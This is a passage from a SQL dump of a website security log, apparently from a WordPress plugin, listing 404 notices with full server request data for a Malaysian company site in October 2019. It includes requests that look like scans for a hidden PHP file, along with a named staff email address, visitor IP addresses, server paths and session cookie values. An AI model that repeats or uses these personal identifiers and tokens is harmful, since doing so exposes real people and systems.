QQBrowser/9.4.8186.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.243.223.170\";s:11:\"REMOTE_PORT\";s:5:\"61993\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XawmeR8r@wEAesy2W-XpcwAAAEI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571563129.6968\";s:12:\"REQUEST_TIME\";s:10:\"1571563129\";}}','notice','2019-10-20 09:18:51','2019-10-20 09:18:50',34917944,36721416,'https://bintara.com.my/?page_id=18',1,0,'91.243.223.170'),(28483,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/wp-includes/js/include.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/wp-includes/js/include.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:27:\"/wp-includes/js/include.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XawzQR8r@wEAesy2W-XzUwAAAFM\";s:19:\"REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/wp-includes/js/include.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:27:\"/wp-includes/js/include.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XawzQR8r@wEAesy2W-XzUwAAAFM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"185.221.152.37\";s:11:\"REMOTE_PORT\";s:5:\"49860\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:49:\"https://bintara.com.my/wp-includes/js/include.php\";s:10:\"SCRIPT_URL\";s:27:\"/wp-includes/js/include.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XawzQR8r@wEAesy2W-XzUwAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571566401.1769\";s:12:\"REQUEST_TIME\";s:10:\"1571566401\";}}','notice','2019-10-20 10:13:24','2019-10-20 10:13:21',35363656,37176296,'https://bintara.com.my/wp-includes/js/include.php',1,0,'185.221.152.37'),(28484,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/wp-includes/js/include.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/wp-includes/js/include.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:27:\"/wp-includes/js/include.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XawzRh8r@wEAesy2W-XzWQAAAEE\";s:19:\"REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/wp-includes/js/include.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:27:\"/wp-includes/js/include.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XawzRh8r@wEAesy2W-XzWQAAAEE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"185.221.152.37\";s:11:\"REMOTE_PORT\";s:5:\"50778\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:49:\"https://bintara.com.my/wp-includes/js/include.php\";s:10:\"SCRIPT_URL\";s:27:\"/wp-includes/js/include.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XawzRh8r@wEAesy2W-XzWQAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571566406.9458\";s:12:\"REQUEST_TIME\";s:10:\"1571566406\";}}','notice','2019-10-20 10:13:28','2019-10-20 10:13:27',34970496,36783688,'https://bintara.com.my/wp-includes/js/include.php',1,0,'185.221.152.37'),(28486,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"56053\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaxSnx8r@wEAesy2W-UJvAAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571574431.097\";s:12:\"REQUEST_TIME\";s:10:\"1571574431\";}}','notice','2019-10-20 12:27:12','2019-10-20 12:27:11',34921816,36728816,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(28487,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"49218860-1F44-4F84-ACF3-C5E0D9B3CDCA\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaxUzx8r@wEAesy2W-UL-AAAAFY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"60.50.141.232\";s:11:\"REMOTE_PORT\";s:5:\"11025\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaxUzx8r@wEAesy2W-UL-AAAAFY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571574991.5957\";s:12:\"REQUEST_TIME\";s:10:\"1571574991\";}}','notice','2019-10-20 12:36:33','2019-10-20 12:36:31',35276472,37077424,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'60.50.141.232'),(28488,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:51:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"354\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{CF0B2B04-9CCE-4FF1-8BC6-E981DFE69742}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:57:\"OutlookSession=\\\"{F4F3C093-13B1-4CF5-B28A-CDE0A4CCA22D}\\\"\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:73:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4639; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:21:\"raihan@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:20:\"HTTP_X_USER_IDENTITY\";s:21:\"raihan@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaxi-x8r@wEAesy2W-UWWwAAAFQ\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"115.164.43.40\";s:11:\"REMOTE_PORT\";s:5:\"18006\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaxi-x8r@wEAesy2W-UWWwAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571578624.0865\";s:12:\"REQUEST_TIME\";s:10:\"1571578624\";}}','notice','2019-10-20 13:37:07','2019-10-20 13:37:04',35735024,37530592,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.164.43.40'),(28489,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:51:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"354\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{753E2919-2A3A-4B4D-A45F-3BDAE615AECE}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:57:\"OutlookSession=\\\"{F4F3C093-13B1-4CF5-B28A-CDE0A4CCA22D}\\\"\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:73:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4639; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:21:\"raihan@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:20:\"HTTP_X_USER_IDENTITY\";s:21:\"raihan@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaxjAh8r@wEAesy2W-UWYAAAAEw\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"115.164.43.40\";s:11:\"REMOTE_PORT\";s:5:\"18011\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaxjAh8r@wEAesy2W-UWYAAAAEw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571578627.1063\";s:12:\"REQUEST_TIME\";s:10:\"1571578627\";}}','notice','2019-10-20 13:37:08','2019-10-20 13:37:07',35278112,37071352,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.164.43.40'),(28490,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:51:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"354\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{A6931EC8-FCE9-45B8-906B-109199E0F489}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:101:\"OutlookSession=\\\"{F4F3C093-13B1-4CF5-B28A-CDE0A4CCA22D}\\\"; icwp-wpsf=34e719aafdd814dbd5a717a21146ac84\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:73:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4639; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:21:\"raihan@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:20:\"HTTP_X_USER_IDENTITY\";s:21:\"raihan@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaxjBh8r@wEAesy2W-UWYwAAAFc\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"115.164.43.40\";s:11:\"REMOTE_PORT\";s:5:\"18006\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaxjBh8r@wEAesy2W-UWYwAAAFc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571578630.1858\";s:12:\"REQUEST_TIME\";s:10:\"1571578630\";}}','notice','2019-10-20 13:37:11','2019-10-20 13:37:10',35280688,37074016,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.164.43.40'),(28491,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 